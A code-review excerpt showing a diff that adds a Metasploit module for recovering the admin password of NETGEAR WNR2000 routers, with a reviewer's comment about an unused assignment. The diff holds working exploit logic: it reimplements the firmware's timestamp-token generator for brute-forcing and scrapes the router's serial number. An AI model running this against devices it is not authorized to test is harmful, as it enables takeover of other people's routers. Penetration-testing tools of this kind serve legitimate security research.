modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb

```diff
@@ -0,0 +1,231 @@
+      'Description' => %q{
+        The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.
+        This vulnerability can be exploited by an unauthenticated attacker who is able to guess
+        the value of a certain timestamp which is in the configuration of the router.
+        Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but
+        it is guaranteed that it can be bruteforced.
+        This module works very reliably and it has been tested with the WNR2000v5, firmware versions
+        1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this
+        has not been tested.
+      },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'],
+          ['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']
+        ],
+      'DisclosureDate'  => 'Dec 20 2016'))
+    register_options(
+      [
+        Opt::RPORT(80)
+      ], self.class)
+    register_advanced_options(
+      [
+        OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),
+        OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting through', 200])
+      ], self.class)
+  end
+
+  def get_current_time
+    res = send_request_cgi({
+      'uri'     => '/',
+      'method'  => 'GET'
+    })
+    if res && res['Date']
+      date = res['Date']
+      return Time.parse(date).strftime('%s').to_i
+    end
+  end
+
+  # Do some crazyness to force Ruby to cast to a single-precision float and
+  # back to an integer.
+  # This emulates the behaviour of the soft-fp library and the float cast
+  # which is done at the end of Netgear's timestamp generator.
+  def ieee754_round (number)
+    [number].pack('f').unpack('f*')[0].to_i
+  end
+
+
+  # This is the actual algorithm used in the get_timestamp function in
+  # the Netgear firmware.
+  def get_timestamp(time)
+    srandom_r time
+    t0 = random_r
+    t1 = 0x17dc65df;
+    hi = (t0 * t1) >> 32;
+    t2 = t0 >> 31;
+    t3 = hi >> 23;
+    t3 = t3 - t2;
+    t4 = t3 * 0x55d4a80;
+    t0 = t0 - t4;
+    t0 = t0 + 0x989680;
+
+    ieee754_round(t0)
+  end
+
+  def get_creds
+    res = send_request_cgi({
+      'uri'     => '/BRS_netgear_success.html',
+      'method'  => 'GET'
+    })
+    if res && res.body =~ /var sn="([\w]*)";/
+      serial = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to obtain serial number, bailing out...")
+    end
+
+    # 1: send serial number
+    res = send_request_cgi({
```

Comment:
It looks like this return value isn't used, so you don't really need the assignment?